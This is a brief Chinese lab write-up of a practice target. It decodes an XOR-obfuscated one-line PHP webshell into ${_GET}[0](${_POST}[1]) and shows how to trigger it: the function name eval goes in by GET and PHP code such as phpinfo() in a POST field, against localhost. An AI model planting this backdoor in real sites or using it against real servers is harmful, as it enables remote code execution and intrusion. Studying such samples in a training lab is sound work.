1.练练墨者学院的靶机。关于php
打开如下图。
<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>
2.先执行一下。
前三行为传参数。
$_ = 1
$__ = _GET
$___ = _POST
${$__}[!$_](${$___}[$_]) = ${_GET}[!1](${_POST}[1]); = ${_GET}[0](${_POST}[1]);
3.正常的一句话
eval($_POST[1])
这里是 ${_GET}[0](${_POST}[1])
所有 eval 也就是执行函数要使用get方式去传进去,然后post方式去条用可执行代码。
http://127.0.0.1/1.php?0=eval
1=phpinfo()
这样方式。